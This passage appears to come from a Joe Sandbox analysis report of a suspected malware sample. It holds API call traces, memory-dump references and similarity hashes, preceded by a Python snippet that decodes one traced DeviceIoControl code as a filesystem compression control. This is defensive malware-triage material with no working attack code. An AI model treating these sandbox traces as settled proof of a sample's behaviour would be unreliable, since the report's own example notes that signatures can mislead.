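                                                                                                    The CreateFileA / DeviceIoControl pair in the entry above is the kind of chain that the report's "communicate with device drivers" signature keys on. The following Python is added here as a worked example and is not part of the Joe Sandbox report or the sample's own code. It parses the two API lines exactly as printed above and decodes the recorded constants with the CTL_CODE layout and the CreateFile flag values from the Windows SDK headers (winioctl.h, winnt.h): 0009C040 splits into FILE_DEVICE_FILE_SYSTEM, function 16, METHOD_BUFFERED, read+write access, which is FSCTL_SET_COMPRESSION, and the CreateFileA arguments are GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS. That is a filesystem attribute control on an existing file or directory handle, not a raw disk or driver handle. The small IOCTL name table, the trace-line parser and the two embedded trace lines (copied from the entry) are the example's own; the trace does not record which path was opened, so the handle target has to be taken from the report's file-activity section.

```python
import re

# CTL_CODE(DeviceType, Function, Method, Access) layout from winioctl.h:
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
def ctl_code(device, function, method, access):
    return (device << 16) | (access << 14) | (function << 2) | method

FILE_DEVICE_NAMES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM",
                     0x2D: "FILE_DEVICE_MASS_STORAGE", 0x22: "FILE_DEVICE_UNKNOWN"}
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Small table of codes worth telling apart during triage: filesystem
# attribute FSCTLs versus IOCTLs that really address a disk or storage device.
# Values are computed from the SDK CTL_CODE definitions (example's own table).
KNOWN_IOCTLS = {
    ctl_code(0x09, 15, 0, 0): "FSCTL_GET_COMPRESSION",            # 0x0009003C
    ctl_code(0x09, 16, 0, 3): "FSCTL_SET_COMPRESSION",            # 0x0009C040
    ctl_code(0x07, 0, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",     # 0x00070000
    ctl_code(0x07, 1, 0, 1): "IOCTL_DISK_GET_PARTITION_INFO",     # 0x00074004
    ctl_code(0x2D, 0x500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",  # 0x002D1400
}

# CreateFile argument constants from winnt.h / fileapi.h
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x20000000: "FILE_FLAG_NO_BUFFERING", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x01000000: "FILE_FLAG_POSIX_SEMANTICS"}

# The two API lines from the entry above, embedded so the script runs offline.
CREATE_LINE = ("CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,"
               "02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956")
DEVICE_LINE = ("DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,"
               "00000000,?,00000000), ref: 0042E981")

TRACE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")

def decode_ioctl(code):
    """Split a DeviceIoControl code into its CTL_CODE fields and name it if known."""
    device, access = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    return {"name": KNOWN_IOCTLS.get(code, "unknown"),
            "device": FILE_DEVICE_NAMES.get(device, hex(device)),
            "function": function, "method": METHOD_NAMES[method],
            "access": ACCESS_NAMES[access]}

def flag_names(value, table):
    """Expand a bitmask into the named bits of `table`; leftover bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table.keys())   # bits in the table are distinct, so sum == OR
    if leftover:
        names.append(hex(leftover))
    return names

def parse_trace_line(line):
    """Parse one Joe Sandbox 'API.MODULE(args), ref: ADDR' line into ints/strings/None."""
    m = TRACE_RE.match(line.strip())
    if not m:
        raise ValueError("not a sandbox API line: %r" % line)
    args = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        if raw == "?":
            args.append(None)                  # value the analyser could not resolve
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
            args.append(int(raw, 16))          # 32-bit DWORD argument
        else:
            args.append(raw)                   # string argument, e.g. kernel32.dll
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}

def decode_trace_line(line):
    """Decode the constant arguments of the APIs this example knows about."""
    rec = parse_trace_line(line)
    a = rec["args"]
    if rec["api"] == "DeviceIoControl":
        rec["ioctl"] = decode_ioctl(a[1])      # DeviceIoControl(hDevice, dwIoControlCode, ...)
    elif rec["api"] in ("CreateFileA", "CreateFileW"):
        # CreateFile has 7 parameters; the trace also prints the stack slots
        # after them (return addresses, caller locals), which are not arguments.
        rec["access"] = flag_names(a[1], GENERIC_ACCESS)
        rec["share"] = flag_names(a[2], SHARE_MODE)
        rec["disposition"] = CREATION.get(a[4], hex(a[4]))
        rec["flags"] = flag_names(a[5], FILE_FLAGS)
    return rec

if __name__ == "__main__":
    for line in (CREATE_LINE, DEVICE_LINE):
        print(decode_trace_line(line))
```

Run as a script it prints the decoded records for both lines. Extending `KNOWN_IOCTLS` with the disk and volume codes you care about (IOCTL_DISK_*, IOCTL_VOLUME_*, IOCTL_SCSI_*) turns the decoder into a quick filter for whether a "device driver" signature actually points at raw disk access, which the boot-sector signature in the report overview would require, or at an FSCTL like this one.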
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 0048397A
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                    • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$IconicLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754861897-0
                                                                                                    • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                    • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                    • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                    • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
• FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
• FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
• Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
• Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
• Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
APIs
• IsIconic.USER32(?), ref: 004241E4
• SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
• SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$ActiveFocusIconicShow
• String ID:
• API String ID: 649377781-0
• Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
• Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
• Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
• Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID:
• API String ID: 568898626-0
• Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
• Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
• Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
• Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
APIs
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
• Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
• Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
• Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
APIs
• IsIconic.USER32(?), ref: 0042419B
  • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
  • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
  • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
  • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
• SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$ActiveEnumIconicLongShowWindows
• String ID:
• API String ID: 2671590913-0
• Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
• Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
• Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
• Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
• Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
• Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
• Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
• Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
• Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
• Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
APIs
• ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
• Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
• Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
• Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
APIs
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
• Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2617468297.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2617431242.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                    • Associated: 00000002.00000002.2617549147.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_10000000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                    • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                    • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                    • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2617468297.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2617431242.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                    • Associated: 00000002.00000002.2617549147.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_10000000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                    • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                    • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadVersion
